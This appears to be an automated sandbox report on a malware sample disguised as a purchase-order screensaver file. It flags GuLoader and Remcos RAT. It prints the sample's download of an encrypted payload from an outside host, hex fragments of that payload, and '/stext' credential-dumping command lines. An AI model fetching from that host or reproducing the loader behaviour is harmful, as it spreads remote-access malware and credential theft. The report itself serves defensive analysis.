                                                                                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                                    Data Ascii: { "geoplugin_request":"8.46.123.75", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.649755164.160.91.324434892C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-11-27 15:50:30 UTC205OUTGET /LcyXvOliFVQGOWvhGBwKi128.bin HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                    Host: www.healthselflesssupplies.co.za
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-11-27 15:50:31 UTC404INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    content-type: application/octet-stream
                                                                                                    last-modified: Wed, 27 Nov 2024 07:08:13 GMT
                                                                                                    accept-ranges: bytes
                                                                                                    content-length: 493120
                                                                                                    date: Wed, 27 Nov 2024 15:50:31 GMT
                                                                                                    server: LiteSpeed
                                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                    2024-11-27 15:50:31 UTC964INData Raw: de 55 ad 08 ca 12 20 f7 ae dd 79 5e 17 70 46 21 89 c2 b6 1c b4 63 ca 22 a9 90 e2 92 43 d8 1d b6 7d b4 72 5d 5d 6d 9d 7b 92 6f 0f ee 86 c5 4d 65 b7 52 07 13 53 52 36 19 8e 93 ac 5c 7c 6f 06 f6 22 ff fc db cf dd 6f 0d 4c c0 34 22 1f 1f b4 cd d8 3a 83 65 32 2d 61 0d fc ec d1 ea 22 61 a7 0e 89 50 5d 52 22 77 4c 8f c1 8c 6d 43 77 8d 71 85 7c 84 bd 8b e5 a1 f1 21 26 a3 93 38 ed 0f 65 63 f0 ab 7e e0 1a 17 84 05 6b 46 f8 85 23 43 08 5b 67 85 19 48 10 4d e8 e2 3f 28 96 3f 54 86 5d 50 7f df 88 fc d5 14 01 fe d4 79 07 64 ed e7 0b f2 c3 51 c3 16 d8 1e 91 20 25 61 d6 e3 ed f9 82 34 ae 29 ef 0e 83 e5 c5 4f 25 91 8a 8b d1 42 e7 74 55 e8 b5 b1 c5 fa 31 4d ae aa b5 3e 7d a4 27 10 5c 5c 14 a5 89 8e 85 3e 57 b5 a3 76 2a 59 fd 88 bf c8 4b e8 c8 0e 6a b8 b0 26 9c e2 6c 36 34
                                                                                                    Data Ascii: U y^pF!c"C}r]]m{oMeRSR6\|o"oL4":e2-a"aP]R"wLmCwq|!&8ec~kF#C[gHM?(?T]PydQ %a4)O%BtU1M>}'\\>Wv*YKj&l64
                                                                                                    2024-11-27 15:50:31 UTC14994INData Raw: 98 9d cf 1c 74 69 4c 2c 02 e2 6a b6 44 ba 93 89 51 f1 52 2f 43 b8 aa 08 72 be 3f c0 6d 50 57 55 20 61 51 92 fe f3 5a 8e 25 0d 33 3a 7a 94 d2 9a 54 f9 b3 00 c3 3c 5d d5 72 d2 81 2d bf b1 cf 20 7f b5 c7 6d 56 ed c8 09 42 d3 a7 53 72 c9 b1 16 05 91 ed 44 90 c9 c0 b0 5d bc 45 85 74 6d ec b4 e7 0c c9 be 5e 57 02 65 55 28 b8 eb 76 d3 2d 35 99 f6 b8 75 54 ee 6c 40 5f 24 6d 31 fb 10 23 fd 79 6d 6e 47 b8 db 86 d3 52 06 5d 4d bd fb 8d 53 5d 87 a2 2c c8 28 90 1d 1f 68 04 8b 18 92 7c 58 2d 4b 28 09 5a d8 01 58 79 77 18 10 ec 97 55 8b 54 ec ba 7f 27 fa 2f 4d 59 ba 04 ad 6b de ad 2e 1e 44 7a 73 d2 4f c2 df 91 92 95 66 6f 11 b9 c6 5e 6d eb d4 9e 4e 6a e1 fd 23 48 48 24 d7 dc eb 77 12 9d 3b 77 29 ec e2 52 0f bd cc ef 1e ba 33 e8 07 49 fa ed 72 54 96 6f be ac 89 27 02 ce
                                                                                                    Data Ascii: tiL,jDQR/Cr?mPWU aQZ%3:zT<]r- mVBSrD]Etm^WeU(v-5uTl@_$m1#ymnGR]MS],(h|X-K(ZXywUT'/MYk.DzsOfo^mNj#HH$w;w)R3IrTo'
                                                                                                    2024-11-27 15:50:31 UTC16384INData Raw: 08 d3 87 3f 9a c5 d1 56 16 0c bf d2 55 97 e7 b2 20 01 fd 31 20 24 82 d0 57 1d a6 09 ee 10 e8 90 a8 6a 08 85 cc 1f 95 c0 23 28 9a 09 32 fd ea 91 da a7 fd 71 74 0c 2a e4 53 5e 04 b4 84 d5 30 0c 3e e6 22 2e 58 3a 09 6c 8b 97 0f d6 9e 55 9f 4a a0 0f a1 62 b8 7e c7 b4 33 bb ad ad 94 84 1f 05 b5 1b 9a 5b 81 00 c4 88 b5 32 59 8c 52 2e 0c 54 ae 14 e7 d1 ba 70 a8 d3 b5 f0 8d f8 58 21 17 70 35 83 84 78 8f 0b 4e 47 ba 7d 45 0e 15 5a 7e 38 80 42 0f 50 fe 23 71 56 f7 00 6f 03 24 7a 0a 8a ee 65 72 0c d5 11 62 62 f5 9c 4f b8 4d 75 f0 dd 0b 30 69 31 c9 1f da 45 86 f0 50 64 78 d7 cf 74 24 48 d8 9b 6f 93 1c 20 9b 15 3b 69 21 0d 27 85 92 94 85 bd f8 5c bd 1a 3f 54 41 22 c0 2b 95 ea d3 5b bd 74 50 6c af 75 79 02 1b a6 68 cc 9d fa 2f 05 73 bc 4a 70 71 22 4b 45 88 c7 aa 2a 4b
                                                                                                    Data Ascii: ?VU 1 $Wj#(2qt*S^0>".X:lUJb~3[2YR.TpX!p5xNG}EZ~8BP#qVo$zerbbOMu0i1EPdxt$Ho ;i!'\?TA"+[tPluyh/sJpq"KE*K
                                                                                                    2024-11-27 15:50:31 UTC16384INData Raw: 12 bc 40 e8 b8 ac 28 93 59 75 a5 96 29 06 08 1c 35 8f ed 97 1b da e0 57 6d 6b 95 74 36 bc 38 43 c5 8d d3 f0 da 6a 62 9d 4a 32 0c 87 49 ee ce dc 86 0f 13 06 12 6e c8 1a ea b1 51 3e 02 f3 e2 e8 4c 33 60 da 6f 0d b7 f7 cb 14 1f d0 39 80 a4 d2 23 6d 32 2d e2 c9 b0 61 54 16 de 9e 58 5e e1 d0 07 14 22 fa 19 87 4c c1 f9 ab 90 77 8e 7a 25 0f 75 63 9e 32 0e de 76 5c 86 9c 97 4b 65 e8 06 3d b9 06 97 ee 19 20 39 6d 06 36 6d 9d a3 46 3d 75 d5 20 e9 ee e7 c4 0b 03 b6 b4 87 7c cc c0 61 9a 61 52 1d cd cd 6f 0b 9b a2 ac 8e 15 a7 2d 69 7b 7b 71 f6 13 9c 42 09 be 90 e3 60 bc 5e dd 9a 02 58 aa b6 28 e0 44 62 26 03 2b 96 1f a2 f1 1c 3c 18 86 61 36 1f bb a2 7e 14 bc 8a 6c c0 e7 24 9b 68 ad 3a 56 2e 8c e6 0e 35 69 74 ad db 80 70 65 57 1f 72 b0 36 b3 a6 f9 bf 04 e5 fa 56 1d 33
                                                                                                    Data Ascii: @(Yu)5Wmkt68CjbJ2InQ>L3`o9#m2-aTX^"Lwz%uc2v\Ke= 9m6mF=u |aaRo-i{{qB`^X(Db&+<a6~l$h:V.5itpeWr6V3
                                                                                                    2024-11-27 15:50:31 UTC16384INData Raw: 5d 81 cf a1 ce b6 b8 e7 dd c4 1b 62 c7 df 2d 36 19 d5 a8 0c 17 35 b0 7f 99 20 05 92 3e 62 e3 a7 a7 07 40 14 61 ae 60 51 17 d2 2c d5 83 f1 92 5e 23 b8 d1 e1 00 9e fc f3 d0 e2 f3 74 85 ad d0 58 f9 43 47 e3 7d 76 12 25 8d e1 2d a8 be fe 61 14 34 52 a8 8e 6c 17 30 dc 4f 8b 13 c5 40 0a c4 37 b5 da f5 5d 6c 06 4b f1 da c8 ad 50 19 b3 6f 11 df 6c c1 d2 a0 e2 8c 5f d8 9a b3 5c 1e 1d 3f 67 fc 73 e8 18 f7 ae 8e aa 46 c8 ea ac 77 ec d1 84 93 f0 b9 65 4d 85 51 66 75 4c 99 d6 ff eb 6e 31 e5 66 dc 9a 2f c1 9a 2e 99 8a c0 5a fa 5d fc 3f 21 e3 bd c8 02 23 32 35 1b 62 da 2b 6b 46 ab e6 01 64 7b e5 0f 99 6c c0 dd 53 f8 82 1a 47 6f 4e 24 82 78 d6 98 3e ba ef ed de 89 7d 28 de 98 01 aa 05 d6 4a df 4f 09 41 ed 2b 9b f1 ac b8 08 06 06 83 ba 44 8f a3 c9 0f 28 27 aa db 59 0c 83
                                                                                                    Data Ascii: ]b-65 >b@a`Q,^#tXCG}v%-a4Rl0O@7]lKPol_\?gsFweMQfuLn1f/.Z]?!#25b+kFd{lSGoN$x>}(JOA+D('Y
                                                                                                    2024-11-27 15:50:31 UTC16384INData Raw: 46 b3 a2 3b 34 c1 c1 22 11 45 0d d5 6d c9 ca 57 8d 92 4c d4 ed c5 c2 70 1b 67 f6 21 8a dd cf 20 8b 30 57 fd bd 8e a6 ab e7 65 f8 b5 02 39 fd 27 e7 a7 12 52 44 99 51 89 56 74 eb 98 0f 3c 78 20 55 e9 91 0b 6e 7b 28 48 54 e5 73 40 68 a8 0e 0c 2e d4 96 66 61 b9 a6 01 ed 87 f7 60 7a 9d 26 90 01 40 b4 9b 58 1d c6 8d cc d7 12 b4 a9 99 fd 7a 71 23 36 a3 23 22 bc 29 18 b1 6a f2 6e 81 27 91 c7 f1 a0 f5 d2 a7 3a 55 2d 38 45 35 19 98 14 e8 9b 34 00 f1 c7 39 57 d6 30 4f bf 68 7f 87 05 98 80 f7 fc 17 43 78 be 90 62 2d 2a f3 31 66 39 cc 8c 55 4f 76 b6 89 f9 3c 09 55 38 74 b3 54 56 dc fd 22 85 bb fe 7e f6 7f fe 4c db 45 7b e9 b1 ec 07 5a 67 3d 9e ef 89 06 98 3f 13 1a 96 be 4b 94 47 6e db cf 4a f2 b0 0b 38 a3 19 16 db c7 be 02 6c 72 b2 7a 34 8f 97 81 4a 62 a3 74 2c d5 72
                                                                                                    Data Ascii: F;4"EmWLpg! 0We9'RDQVt<x Un{(HTs@h.fa`z&@Xzq#6#")jn':U-8E549W0OhCxb-*1f9UOv<U8tTV"~LE{Zg=?KGnJ8lrz4Jbt,r
                                                                                                    2024-11-27 15:50:31 UTC16384INData Raw: 9e dc ac b1 a9 97 d8 bd c5 4f b0 79 6b 3f bc f2 28 36 ae 1c e6 2a cc 0a 4e f8 6c ea cf c6 8b 70 ab ea 08 ae b5 8f a1 58 c6 c6 e6 a2 b6 46 9c bc d4 40 ba ab ec ef 9a b9 d1 c5 b3 a5 8f 7e 56 85 c1 37 d1 00 71 c1 18 d7 60 84 72 0d 62 c4 0a 2a 3b 78 52 4d d0 a9 f3 68 a7 84 03 35 45 18 7a 7e d8 79 47 ee 86 61 b0 18 6f 0b 81 a7 c4 7d 45 02 a7 06 cc b8 99 56 30 98 e2 16 c2 ae 58 29 1c 10 60 e5 83 02 c2 31 96 2c 23 d3 97 d0 58 7c 7d a8 d2 6c b9 9d 43 05 3d 69 33 25 65 41 62 51 e8 c2 35 13 14 01 b7 4a 6f 00 4a 31 ae e4 e4 f3 b1 58 50 07 52 dc 0d 36 4d 0e 65 2c 44 c3 f1 fb 93 64 13 92 b9 e4 7f d4 9a 53 2d ce 14 b1 fa be 09 3b 6d 45 2a ad 81 47 3d 3f 15 03 1f 11 43 52 48 c8 e5 be 1f 82 70 ff 9e 68 3b d8 e2 e1 02 9b 5a b8 72 05 0f 3f 71 f3 bd a6 1c 9b fd e1 e7 9b b6
                                                                                                    Data Ascii: Oyk?(6*NlpXF@~V7q`rb*;xRMh5Ez~yGao}EV0X)`1,#X|}lC=i3%eAbQ5JoJ1XPR6Me,DdS-;mE*G=?CRHph;Zr?q
                                                                                                    2024-11-27 15:50:31 UTC16384INData Raw: de 96 aa aa ec 6d 55 d1 d0 c7 ed 9b 76 ba c7 3a 77 81 2a 08 76 5e 6a 7c c9 46 b6 86 18 00 27 18 57 99 cc 3b 68 15 1a 85 52 bb c3 6e 82 85 34 20 20 18 16 84 05 92 03 a4 56 9f 15 bb b2 d4 0b 11 9e 32 92 fe b9 64 ed 0f 38 a7 fd a4 1d a5 bf d2 36 c3 57 30 b0 97 8f a7 51 97 89 b9 ae 29 96 76 c0 74 23 09 11 c8 89 4b 21 3f 62 f7 cf 4c ff 98 a4 e9 d7 e3 6a 35 21 5e 93 04 14 15 d1 eb 4f 31 df e0 fb c3 d3 07 28 a4 56 95 20 61 3b 8e ae 99 5b 71 30 e1 40 7f 7a cb 8c 53 97 93 b3 0f 74 fd 0d 2a 67 2a f2 68 bf 72 4c cc 5f e0 91 e6 63 01 bb 4c 42 58 4e 04 18 ce 82 d6 8d c5 c9 57 c9 44 bc 94 4d 4f ee b6 8b 0b 65 f0 c3 18 8e 37 22 73 12 e1 87 5c a7 81 66 8a c5 8b 66 09 47 13 dd aa 48 56 d2 60 49 21 28 6c 4e ed be c1 02 6d b0 db ee 78 c1 95 0e 2f 70 f7 ba d7 df 30 04 3e e4
                                                                                                    Data Ascii: mUv:w*v^j|F'W;hRn4 V2d86W0Q)vt#K!?bLj5!^O1(V a;[q0@zSt*g*hrL_cLBXNWDMOe7"s\ffGHV`I!(lNmx/p0>
                                                                                                    2024-11-27 15:50:32 UTC16384INData Raw: 33 d3 a8 f5 ec 2d e7 bc 97 bb e7 ac dc c8 29 62 14 27 a0 b6 b8 c3 26 8e fd 1b de 78 3e 43 d0 d8 dc 14 cb 9b 9a 8e 5a 54 78 2a 60 c6 4e ee 41 63 7f 70 d0 b8 a0 e6 93 71 3f d7 4b de 14 85 2a 44 a9 a3 84 0d 09 00 5b 9d 8f 36 72 69 99 1b 5a 7d bb 40 23 08 53 9f ad 65 da 62 24 4f ca 50 55 d1 1e 13 02 af 39 90 b8 ef 04 71 7c b2 98 22 90 1b 77 71 0a 69 04 ee 25 83 f0 5c 0c 51 77 6f cf e1 0f 41 3f 6c 5e 70 a8 3a b8 a0 7b 7e 06 0b ae 85 4c cf c0 98 96 0a 5c e1 bc 0f 0e 2a b3 36 e5 45 68 a2 5f dc c3 db e6 2c 41 d3 5c 39 87 d1 d9 fc 42 0a db 9a 35 86 1f 21 80 0a b8 69 38 34 6a a0 f1 40 35 0f 2d e1 47 21 bb ec 08 0f e7 77 0d 8a f1 b5 da 61 ed a4 a8 dc 47 40 d9 7a 9a 9c 44 87 1e 7c d1 82 d0 39 70 7c f4 ca dd e6 48 d3 fa 87 79 26 d1 48 c8 5b 62 4b f2 2f b9 1d 04 d2 4b
                                                                                                    Data Ascii: 3-)b'&x>CZTx*`NAcpq?K*D[6riZ}@#Seb$OPU9q|"wqi%\QwoA?l^p:{~L\*6Eh_,A\9B5!i84j@5-G!waG@zD|9p|Hy&H[bK/K
                                                                                                    2024-11-27 15:50:32 UTC16384INData Raw: 14 71 43 32 7a 7a 17 d0 ed da 0e c0 59 97 dc c6 79 58 1f 57 8f 85 5d 17 e3 c3 fc ce 40 16 73 f6 e1 d9 52 04 18 b9 f0 ee 66 46 dd e8 a8 3d 95 9b c2 f1 39 32 82 f7 63 72 83 34 ff 36 5e 65 80 b1 8e e9 40 ca 64 8e c0 43 48 98 46 e2 ea ad 74 c1 e6 a3 7b f7 b3 69 d8 9d 8a 0c 5b 46 08 b4 64 9f b9 38 3b 69 06 c2 7a e5 a0 01 c9 61 75 59 8f b8 4c 94 ae d6 9a 44 be 28 cd 94 79 11 e3 7f 93 c1 f2 57 80 c9 d6 b9 f2 67 dd 2c 4e c4 57 3f e2 ef c6 31 44 32 62 25 a3 8c 1e 88 eb 2f a6 2d 97 d2 bd 91 cd 18 fe 55 14 37 a7 a5 c5 74 0c 4e c0 bb ce 2e b2 d2 ec f7 c4 5a e0 ea 2e e0 b1 de e7 0b 72 68 74 ea 5e 24 c6 fe 00 4b 0a 88 7c c7 3f 49 d2 46 29 dd 6b 4b 51 f3 22 4a c6 5d 7e 03 66 b3 6e 58 f9 aa 61 a8 fd 66 30 c7 39 b7 29 1b 08 22 3d 00 7d 1f 21 4e 45 f4 30 e4 7c cf c7 98 b9
                                                                                                    Data Ascii: qC2zzYyXW]@sRfF=92cr46^e@dCHFt{i[Fd8;izauYLD(yWg,NW?1D2b%/-U7tN.Z.rht^$K|?IF)kKQ"J]~fnXaf09)"=}!NE0|


                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:10:49:57
                                                                                                    Start date:27/11/2024
                                                                                                    Path:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"
                                                                                                    Imagebase:0x400000
                                                                                                    File size:676'214 bytes
                                                                                                    MD5 hash:5E1C814FC675448C381899D325ABA145
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2227487287.000000000872C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:2
                                                                                                    Start time:10:50:09
                                                                                                    Start date:27/11/2024
                                                                                                    Path:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"
                                                                                                    Imagebase:0x400000
                                                                                                    File size:676'214 bytes
                                                                                                    MD5 hash:5E1C814FC675448C381899D325ABA145
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.2541293582.000000000641B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.2556975823.000000000641B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.2541332052.000000000641B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Target ID:6
                                                                                                    Start time:10:50:43
                                                                                                    Start date:27/11/2024
                                                                                                    Path:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\lpbpuoswhxqpduzrodqpwzbywtn"
                                                                                                    Imagebase:0x400000
                                                                                                    File size:676'214 bytes
                                                                                                    MD5 hash:5E1C814FC675448C381899D325ABA145
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:7
                                                                                                    Start time:10:50:43
                                                                                                    Start date:27/11/2024
                                                                                                    Path:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\njgavgdycficoinvfolrymwhxifwkll"
                                                                                                    Imagebase:0x400000
                                                                                                    File size:676'214 bytes
                                                                                                    MD5 hash:5E1C814FC675448C381899D325ABA145
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:8
                                                                                                    Start time:10:50:43
                                                                                                    Start date:27/11/2024
                                                                                                    Path:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xlmtozosqnagqojhoyykjqqygopfdwcbcs"
                                                                                                    Imagebase:0x400000
                                                                                                    File size:676'214 bytes
                                                                                                    MD5 hash:5E1C814FC675448C381899D325ABA145
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:18.8%
                                                                                                      Dynamic/Decrypted Code Coverage:13.9%
                                                                                                      Signature Coverage:18.7%
                                                                                                      Total number of Nodes:1520
                                                                                                      Total number of Limit Nodes:36
                                                                                                      execution_graph 4922 10001000 4925 1000101b 4922->4925 4932 10001516 4925->4932 4927 10001020 4928 10001024 4927->4928 4929 10001027 GlobalAlloc 4927->4929 4930 1000153d 3 API calls 4928->4930 4929->4928 4931 10001019 4930->4931 4934 1000151c 4932->4934 4933 10001522 4933->4927 4934->4933 4935 1000152e GlobalFree 4934->4935 4935->4927 4936 401d41 GetDC GetDeviceCaps 4937 402b1d 18 API calls 4936->4937 4938 401d5f MulDiv ReleaseDC 4937->4938 4939 402b1d 18 API calls 4938->4939 4940 401d7e 4939->4940 4941 405f6a 18 API calls 4940->4941 4942 401db7 CreateFontIndirectW 4941->4942 4943 4024e8 4942->4943 3945 403cc2 3946 403e15 3945->3946 3947 403cda 3945->3947 3948 403e26 GetDlgItem GetDlgItem 3946->3948 3957 403e66 3946->3957 3947->3946 3949 403ce6 3947->3949 3952 40419a 19 API calls 3948->3952 3950 403cf1 SetWindowPos 3949->3950 3951 403d04 3949->3951 3950->3951 3954 403d21 3951->3954 3955 403d09 ShowWindow 3951->3955 3956 403e50 SetClassLongW 3952->3956 3953 403ec0 3963 403e10 3953->3963 4015 4041e6 3953->4015 3959 403d43 3954->3959 3960 403d29 DestroyWindow 3954->3960 3955->3954 3961 40140b 2 API calls 3956->3961 3957->3953 3962 401389 2 API calls 3957->3962 3965 403d48 SetWindowLongW 3959->3965 3966 403d59 3959->3966 3964 404123 3960->3964 3961->3957 3967 403e98 3962->3967 3964->3963 3973 404154 ShowWindow 3964->3973 3965->3963 3970 403e02 3966->3970 3971 403d65 GetDlgItem 3966->3971 3967->3953 3972 403e9c SendMessageW 3967->3972 3968 40140b 2 API calls 3986 403ed2 3968->3986 3969 404125 DestroyWindow EndDialog 3969->3964 4052 404201 3970->4052 3974 403d95 3971->3974 3975 403d78 SendMessageW IsWindowEnabled 3971->3975 3972->3963 3973->3963 3978 403da2 3974->3978 3979 403db5 3974->3979 3980 403de9 SendMessageW 3974->3980 3989 403d9a 3974->3989 3975->3963 3975->3974 3978->3980 3978->3989 3983 403dd2 3979->3983 3984 403dbd 3979->3984 3980->3970 3982 40419a 19 API calls 3982->3986 3988 40140b 2 API calls 3983->3988 4046 40140b 3984->4046 3985 403dd0 3985->3970 3986->3963 3986->3968 3986->3969 3986->3982 4006 404065 DestroyWindow 3986->4006 4018 405f6a 3986->4018 4036 40419a 3986->4036 3990 403dd9 3988->3990 4049 404173 3989->4049 3990->3970 3990->3989 3992 403f4d GetDlgItem 3993 403f62 3992->3993 3994 403f6a ShowWindow KiUserCallbackDispatcher 3992->3994 3993->3994 4039 4041bc KiUserCallbackDispatcher 3994->4039 3996 403f94 EnableWindow 3999 403fa8 3996->3999 3997 403fad GetSystemMenu EnableMenuItem SendMessageW 3998 403fdd SendMessageW 3997->3998 3997->3999 3998->3999 3999->3997 4040 4041cf SendMessageW 3999->4040 4041 405f48 lstrcpynW 3999->4041 4002 40400b lstrlenW 4003 405f6a 18 API calls 4002->4003 4004 404021 SetWindowTextW 4003->4004 4042 401389 4004->4042 4006->3964 4007 40407f CreateDialogParamW 4006->4007 4007->3964 4008 4040b2 4007->4008 4009 40419a 19 API calls 4008->4009 4010 4040bd GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4009->4010 4011 401389 2 API calls 4010->4011 4012 404103 4011->4012 4012->3963 4013 40410b ShowWindow 4012->4013 4014 4041e6 SendMessageW 4013->4014 4014->3964 4016 4041fe 4015->4016 4017 4041ef SendMessageW 4015->4017 4016->3986 4017->4016 4033 405f77 4018->4033 4019 4061c2 4020 4061d8 4019->4020 4082 405f48 lstrcpynW 4019->4082 4020->3986 4022 40602a GetVersion 4022->4033 4023 406190 lstrlenW 4023->4033 4024 405f6a 10 API calls 4024->4023 4027 4060a5 GetSystemDirectoryW 4027->4033 4029 4060b8 GetWindowsDirectoryW 4029->4033 4031 405f6a 10 API calls 4031->4033 4032 406131 lstrcatW 4032->4033 4033->4019 4033->4022 4033->4023 4033->4024 4033->4027 4033->4029 4033->4031 4033->4032 4034 4060ec SHGetSpecialFolderLocation 4033->4034 4066 405e15 RegOpenKeyExW 4033->4066 4071 4061dc 4033->4071 4080 405e8f wsprintfW 4033->4080 4081 405f48 lstrcpynW 4033->4081 4034->4033 4035 406104 SHGetPathFromIDListW CoTaskMemFree 4034->4035 4035->4033 4037 405f6a 18 API calls 4036->4037 4038 4041a5 SetDlgItemTextW 4037->4038 4038->3992 4039->3996 4040->3999 4041->4002 4044 401390 4042->4044 4043 4013fe 4043->3986 4044->4043 4045 4013cb MulDiv SendMessageW 4044->4045 4045->4044 4047 401389 2 API calls 4046->4047 4048 401420 4047->4048 4048->3989 4050 404180 SendMessageW 4049->4050 4051 40417a 4049->4051 4050->3985 4051->4050 4053 404219 GetWindowLongW 4052->4053 4054 4042a2 4052->4054 4053->4054 4055 40422a 4053->4055 4054->3963 4056 404239 GetSysColor 4055->4056 4057 40423c 4055->4057 4056->4057 4058 404242 SetTextColor 4057->4058 4059 40424c SetBkMode 4057->4059 4058->4059 4060 404264 GetSysColor 4059->4060 4061 40426a 4059->4061 4060->4061 4062 404271 SetBkColor 4061->4062 4063 40427b 4061->4063 4062->4063 4063->4054 4064 404295 CreateBrushIndirect 4063->4064 4065 40428e DeleteObject 4063->4065 4064->4054 4065->4064 4067 405e89 4066->4067 4068 405e49 RegQueryValueExW 4066->4068 4067->4033 4069 405e6a RegCloseKey 4068->4069 4069->4067 4072 4061e9 4071->4072 4074 40625f 4072->4074 4075 406252 CharNextW 4072->4075 4078 40623e CharNextW 4072->4078 4079 40624d CharNextW 4072->4079 4083 4059c0 4072->4083 4073 406264 CharPrevW 4073->4074 4074->4073 4076 406285 4074->4076 4075->4072 4075->4074 4076->4033 4078->4072 4079->4075 4080->4033 4081->4033 4082->4020 4084 4059c6 4083->4084 4085 4059dc 4084->4085 4086 4059cd CharNextW 4084->4086 4085->4072 4086->4084 4944 